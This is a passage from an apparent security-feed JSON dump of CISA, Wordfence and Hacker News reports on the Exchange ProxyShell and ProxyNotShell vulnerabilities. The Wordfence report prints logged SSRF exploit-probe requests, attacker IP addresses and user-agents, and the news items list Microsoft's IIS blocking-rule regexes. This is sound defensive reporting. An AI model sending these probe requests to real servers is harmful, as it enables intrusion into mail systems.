ProxyShell vulnerabilities\u2014to protect against these attacks. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "wordfence": [{"lastseen": "2022-10-19T17:09:20", "description": "The Wordfence Threat Intelligence team has been monitoring exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082, collectively known as ProxyNotShell. These vulnerabilities are actively being exploited in the wild. At the time of writing, we have observed 1,658,281 exploit attempts across our network of 4 million protected websites.\n\nGiven that a quick Shodan search shows 214,671 hosts running Exchange, this is not an insignificant vulnerability. Fortunately, tracking exploit attempts has been made easy due to the similarities to the ProxyShell vulnerability from 2021. From the time we began tracking ProxyNotShell, we have observed 3,543 IP addresses across 365 hosts sending requests that are attempting to probe for and exploit the vulnerabilities.\n\nFor more details on ProxyNotShell and the data we have collected, continue reading below or [download a PDF of this post here](<https://www.wordfence.com/wp-content/uploads/2022/10/Two-Weeks-of-Monitoring-ProxyNotShell-CVE-2022-41040-CVE-2022-41082-Threat-Activity-post.pdf>).\n\nThe following top 20 IP addresses are responsible for 313,011 of the tracked exploit attempts.\n\n * 91.245.255.98\n * 152.89.198.108\n * 199.47.92.216\n * 192.241.217.237\n * 192.241.217.39\n * 192.241.219.153\n * 192.241.219.69\n * 192.241.213.162\n * 192.241.219.73\n * 192.241.212.186\n * 192.241.216.62\n * 192.241.212.202\n * 192.241.216.14\n * 192.241.218.85\n * 192.241.215.205\n * 192.241.220.212\n * 192.241.202.142\n * 192.241.220.87\n * 192.241.218.123\n * 192.241.212.173\n\nLooking at the IP addresses being logged, it quickly becomes apparent that a large number of the IP addresses are part of the same CIDR range of 192.241.192.0/19. Nearly one-third of our logged requests probing and targeting this vulnerability come from these IP addresses, which are assigned to DigitalOcean. This means that Digitalocean\u2019s ASN is hosting nearly 3 times as many IPs sending requests targeting this vulnerability compared to the next most active host.\n\n\n\nWhile DigitalOcean is a legitimate virtual and dedicated server provider with a high reputation, it is still the source of many of the requests we have tracked. Threat actors often look for affordable solutions to quickly spin up an attack campaign, and in this case it appears that at least one threat actor either chose to use DigitalOcean as their provider or purchased access to a number of compromised servers on their network.\n\nMany of the requests we have observed thus far utilize GET requests to discover if the target is a vulnerable Exchange server. The requests we are seeing follow a few basic variations ranging from a basic `GET /autodiscover/autodiscover.json?%40zdi%2FPowershell= HTTP/1.1` to more complex requests like `GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1`. The second request example is an early proof-of-concept that has been used widely since its public release. If this looks familiar, that\u2019s because it is the same as the ProxyShell vulnerability exploit.\n\nThe user-agent also has a number of variations, primarily one reused from the user-agent for Firefox 105 on Windows 10. The top ten user-agent strings can be seen here:\n\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\n * Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0\n * Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36\n * Fuzz Faster U Fool v1.5.0-dev\n * Amazon CloudFront\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 X-Middleton/1\n * Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\n * curl/7.79.1\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n\n\n\nThe top user-agent also appears with the most common request we are seeing, which can be seen in the request header below.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`Geoip-Addr: 91.245.255.98` \n`Connection: close` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Host: <redacted>`\n\nWhile the above GET request has been observed in 224,794 requests, it is used with multiple variations of request headers, though there are some consistencies in the query string. All of the requests are GET requests, are probing /autodiscover/autodiscover.json, and use Powershell, which are requirements to exploit this vulnerability.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`Connection: keep-alive` \n`Host: www.<redacted>.com`\n\nAs mentioned previously, the user-agent primarily being observed is Google Chrome on Windows 10, however despite that, we have observed a number of user-agent request headers that include MacOS user-agents, such as this header that includes an older user-agent for Firefox 76 on MacOS Mojave. In fact, this was the second-largest user-agent observed, with 35,811 requests logged.\n\n`GET /autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com HTTP/1.1` \n`Accept-Encoding: gzip` \n`Connection: close` \n`Host: <redacted>:443` \n`Referer: https://<redacted>:443/autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com` \n`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0`\n\nWhile less common, we are also seeing more complicated GET requests as well as more distinctive user-agents. The following request shows an attempt to exploit the ProxyNotShell vulnerabilities on a university website, using an open-source web fuzzer known as Fuzz Faster U Fool, which we see reflected in the user-agent string. This is one example of a logged exploit attempt that could either be the university\u2019s security team probing for the vulnerability to ensure any security holes are closed, or a threat actor probing for vulnerabilities to exploit. However, as this request was aimed at the website and not an Exchange server, it is more likely that this was an attempt by a threat actor to identify a vulnerability for the purpose of exploiting it.\n\n`GET /autodiscover/autodiscover.json?aa%40mail_<redacted>_edu_v6_6ipl9gf1rbdde8jlvh33c0t1tszjnbb0_<redacted>_com%2Fowa%2F%3F=&Email=autodiscover%2Fautodiscover.json%3Fa%40mail.<redacted>.edu.v6.6ipl9gf1rbdde8jlvh33c0t1tszjnbb0.<redacted>.com&Protocol=Autodiscoverv1&mail_<redacted>_edu_v6_euctlor93jplqgvt7pfbo85950brzin7_<redacted>_com=&protocol=Powershell HTTP/1.1` \n`Accept-Encoding: gzip` \n`Host: mail.<redacted>.edu` \n`User-Agent: Fuzz Faster U Fool v1.5.0-dev` \n`X-Https: 1`\n\nAs with ProxyShell, the ProxyNotShell exploit used on a vulnerable Exchange server can lead to remote code execution (RCE) on the server. This could lead to full takeover of a vulnerable server. The good news is that unlike ProxyShell, ProxyNotShell requires the threat actor to be authenticated with a real email address in order to exploit the vulnerability.\n\nThe Wordfence Intelligence IP Threat Feed will show new IP addresses attacking CVE-2022-41040 and CVE-2022-41082 in the \u201crce\u201d category as the feed is updated every 60 minutes.\n\nThe post [Two Weeks of Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity](<https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T16:01:59", "type": "wordfence", "title": "Two Weeks of Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-19T16:01:59", "id": "WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "href": "https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-10-01T06:04:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhgl2CxdfICXD4YylZ3fmq7SfJser8j-42cMqU2vbSAzyQPe4aSApGawM37IvHE5L5BynSmtvS5oS0W37yOuR2b0ADOCJOYaxGMQw4b-7y_tf3n-L3iYrYCIZPkpyGA0JtfdssxXvGwCr54-CPt4mdR96xiq5tuxt8FFVPA2JX3PSijoskfmmIYDwNS/s728-e100/microsoft-exchange-hacking.jpg>)\n\nMicrosoft officially disclosed it investigating two zero-day security vulnerabilities impacting Exchange Server 2013, 2016, and 2019 following [reports of in-the-wild exploitation](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>).\n\n\"The first vulnerability, identified as [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>), is a Server-Side Request Forgery ([SSRF](<https://en.wikipedia.org/wiki/Server-side_request_forgery>)) vulnerability, while the second, identified as [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>), allows remote code execution (RCE) when PowerShell is accessible to the attacker,\" the tech giant [said](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>).\n\nThe company also confirmed that it's aware of \"limited targeted attacks\" weaponizing the flaws to obtain initial access to targeted systems, but emphasized that authenticated access to the vulnerable Exchange Server is required to achieve successful exploitation.\n\nThe attacks detailed by Microsoft show that the two flaws are stringed together in an exploit chain, with the SSRF bug enabling an authenticated adversary to remotely trigger arbitrary code execution.\n\nThe Redmond-based company further emphasized that it's working on an \"accelerated timeline\" to push a fix, while urging on premises Microsoft Exchange customers to add a blocking rule in IIS Manager as a temporary workaround to mitigate potential threats.\n\nIt's worth noting that Microsoft Exchange Online Customers are not affected. The steps to add the blocking rule are as follows -\n\n 1. Open the IIS Manager\n 2. Expand the Default Web Site\n 3. Select Autodiscover\n 4. In the Feature View, click URL Rewrite\n 5. In the Actions pane on the right-hand side, click Add Rules\n 6. Select Request Blocking and click OK\n 7. Add String \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes) and click OK\n 8. Expand the rule and select the rule with the Pattern \".*autodiscover\\\\.json.*\\@.*Powershell.*\" and click Edit under Conditions\n 9. Change the condition input from {URL} to {REQUEST_URI}\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-09-30T09:01:00", "type": "thn", "title": "Microsoft Confirms 2 New Exchange Zero-Day Flaws Being Used in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T05:48:11", "id": "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "href": "https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T06:04:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi9curQBhNNFXVb7VMBAzdw4XqdlsRjjQO1TKoTP_j324ubmIjk9pqa624KRULI6wr62I5mCw6kwv5V7wAOuLszOF38jRdG5L0uMRGSF_wbY7B8Tf8xxuDiq7vHa3JRrFkp9bwK0s3z3LdKaWNgmAED48clrraRNSd-7DXt9XvTyxpt1PFJ0gS6hRc6/s728-e100/ms.jpg>)\n\nMicrosoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed.\n\nThe two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed [ProxyNotShell](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) due to similarities to another set of flaws called [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), which the tech giant resolved last year.\n\nIn-the-wild attacks abusing the [shortcomings](<https://kb.cert.org/vuls/id/915563>) have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells.\n\nThe Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted attacks.\n\nIn the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager.\n\nHowever, according to security researcher Jang ([@testanull](<https://twitter.com/testanull/status/1576774007826718720>)), the URL pattern can be easily circumvented, with senior vulnerability analyst Will Dormann [noting](<https://twitter.com/wdormann/status/1576922677675102208>) that the block mitigations are \"unnecessarily precise, and therefore insufficient.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpQsLFSw9UR9_SvNk6WQy9mwfkRcm3XlnjHABkGcn5zq8dy9nknbIRrBwkrbf_VJJvMMFLN_mUcYz8qvRkQqQsJzX0ofT7lPbRq_quwfXfFCfXjlRkKZNj3efBVbrnrgJU3Vi2386QzY6BgMNCEjLdFXD3_yuvqsRn6KGIxA6muukpIgnj2Cmxv06P/s728-e100/ms.jpg>)\n\nMicrosoft has since [revised](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) the URL Rewrite rule (also available as a standalone [PowerShell script](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)) to take this into account -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026\n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: .*autodiscover\\\\.json.*Powershell.* and click Edit under Conditions\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nIt's not immediately clear when Microsoft plans to push a patch for the two vulnerabilities, but it's possible that they could be shipped as part of Patch Tuesday updates next week on October 11, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T05:31:00", "type": "thn", "title": "Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T04:57:27", "id": "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "href": "https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-10T04:05:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjeUWuPrjVRtuLfvZ08ImJeXt0BdQpRXeQ6I0n0SAV_PvlNadxnD9aN7xs4GdR3dnw4vc_xgBx7ZMfuF4JsmZ8SVjY0DMxorkecTx87m3KMhPPwj-eMcuw7qBH0ZOWX2k0C8AUY_BQjxGr0uihjZw9opxQt8RNXIK3HVcztB-5v-tFUuZFDzyfQoLAw/s728-e100/ms.jpg>)\n\nMicrosoft on Friday [disclosed](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it has made more improvements to the [mitigation method](<https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html>) offered as a means to prevent exploitation attempts against the newly disclosed unpatched security flaws in Exchange Server.\n\nTo that end, the tech giant has revised the blocking rule in IIS Manager from \".*autodiscover\\\\.json.*Powershell.*\" to \"(?=.*autodiscover\\\\.json)(?=.*powershell).\"\n\nThe list of updated steps to add the URL Rewrite rule is below -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \"(?=.*autodiscover\\\\.json)(?=.*powershell)\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern: (?=.*autodiscover\\\\.json)(?=.*powershell) and click Edit under Conditions\n * Change the Condition input from {URL} to {UrlDecode:{REQUEST_URI}} and then click OK\n\nAlternatively, users can achieve the desired protections by executing a PowerShell-based Exchange On-premises Mitigation Tool ([EOMTv2.ps1](<https://microsoft.github.io/CSS-Exchange/Security/EOMTv2/>)), which has also been updated to take into account the aforementioned URL pattern.\n\nThe [actively-exploited issues](<https://viz.greynoise.io/tag/exchange-proxynotshell-vuln-check?days=30>), called ProxyNotShell (CVE-2022-41040 and CVE-2022-41082), are yet to be addressed by Microsoft, although with Patch Tuesday right around the corner, the wait may not be for long.\n\nSuccessful weaponization of the flaws could enable an authenticated attacker to chain the two vulnerabilities to achieve remote code execution on the underlying server.\n\nThe tech giant, last week, [acknowledged](<https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html>) that the shortcomings may have been abused by a single state-sponsored threat actor since August 2022 in limited targeted attacks aimed at less than 10 organizations worldwide.\n\n**_Update:_** Microsoft, over the weekend, said that it has once again made a correction to the URL string \u2013 \"(?=.*autodiscover)(?=.*powershell)\" \u2013 to be added to the blocking rule in IIS Manager to prevent exploitation attempts.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T05:13:00", "type": "thn", "title": "Microsoft Issues Improved Mitigations for Unpatched Exchange Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-10T03:51:40", "id": "THN:8200D2C2E1DD329D680C5E699177551B", "href": "https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-06T16:20:52", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiLG9V9B_xVvwA7aFCGySTOO5wtWjfUUfXnD668vDSJkbzBIm2NPP6g1ky-ViCG-wKLpXABQxIlv8utmjMKQL51hpJiXyYY2TLTY38wdOqX0wsX_F8diipfii3BtEeoyjJyWWMKayJerKNP8K8LA9mMdq2btrtQu479xoi3zF86AABjwbqGkg-1x_DY/s728-e100/ms.jpg>)\n\nMicrosoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the [two newly disclosed zero-day flaws](<https://thehackernews.com/2022/09/microsoft-confirms-2-new-exchange-zero.html>) in a limited set of attacks aimed at less than 10 organizations globally.\n\n\"These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration,\" the Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) in a new analysis.\n\nThe weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the \"highly privileged access Exchange systems confer onto an attacker.\"\n\nThe tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative disclosed the flaws to Microsoft Security Response Center (MSRC) earlier last month on September 8-9, 2022.\n\nThe two vulnerabilities have been collectively dubbed [**ProxyNotShell**](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>), owing to the fact that \"it is the same path and SSRF/RCE pair\" as [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) but with authentication, suggesting an incomplete patch.\n\nThe issues, which are strung together to achieve remote code execution, are listed below -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) (CVSS score: 8.8) - Microsoft Exchange Server Remote Code Execution Vulnerability\n\n\"While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user,\" Microsoft said. \"Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjDHuP8RcawOweo1l6ugi9Ob9HAQv5FloiZoBENRZJT1OGy1-icUmXQvdS86HsNfrxOCd9PP7M0XaqOZf1bLcVGic0MzVny5fGJtRDkn9gJzNIkyRzbf0NI5KIZSFcJkY_K7_R4TE6PtOAWo3h_NhgHlKy4YxwtTGQVxWAPzI6FaEI3z9CMmjvAJYMUZA/s728-e100/ms.jpg>)\n\nThe vulnerabilities were [first discovered](<https://thehackernews.com/2022/09/warning-new-unpatched-microsoft.html>) by Vietnamese cybersecurity company GTSC as part of its incident response efforts for an unnamed customer in August 2022. A Chinese threat actor is suspected to be behind the intrusions.\n\nThe development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/09/30/cisa-adds-three-known-exploited-vulnerabilities-catalog>) the two Microsoft Exchange Server zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the patches by October 21, 2022.\n\nMicrosoft said that it's working on an \"accelerated timeline\" to release a fix for the shortcomings. It has also [published a script](<https://aka.ms/EOMTv2>) for the following URL Rewrite mitigation steps that it said is \"successful in breaking current attack chains\" -\n\n * Open IIS Manager\n * Select Default Web Site\n * In the Feature View, click URL Rewrite\n * In the Actions pane on the right-hand side, click Add Rule(s)\u2026 \n * Select Request Blocking and click OK\n * Add the string \".*autodiscover\\\\.json.*\\@.*Powershell.*\" (excluding quotes)\n * Select Regular Expression under Using\n * Select Abort Request under How to block and then click OK\n * Expand the rule and select the rule with the pattern .*autodiscover\\\\.json.*\\@.*Powershell.* and click Edit under Conditions.\n * Change the Condition input from {URL} to {REQUEST_URI}\n\nAs additional prevention measures, the company is urging companies to enforce multi-factor authentication (MFA), disable [legacy authentication](<https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication#moving-away-from-legacy-authentication>), and educate users about [not accepting](<https://thehackernews.com/2022/09/uber-claims-no-sensitive-data-exposed.html>) unexpected two-factor authentication (2FA) prompts.\n\n\"Microsoft Exchange is a juicy target for threat actors to exploit for two primary reasons,\" Travis Smith, vice president of malware threat research at Qualys, told The Hacker News.\n\n\"First, Exchange [...] being directly connected to the internet creates an attack surface which is accessible from anywhere in the world, drastically increasing its risk of being attacked. Secondly, Exchange is a mission critical function -- organizations can't just unplug or turn off email without severely impacting their business in a negative way.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-01T06:36:00", "type": "thn", "title": "State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T12:45:52", "id": "THN:A5B36072ED31304F26AF0879E3E5710E", "href": "https://thehackernews.com/2022/10/state-sponsored-hackers-likely.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained vulnerabilities could grant an outsider attacker the ability to read emails directly off an organization's server the ability to breach the organization with CVE-2022-41040 Remote Code Execution and implant malware on the organization's Exchange Server with CVE-2022-41082.\n\nThough it appears that 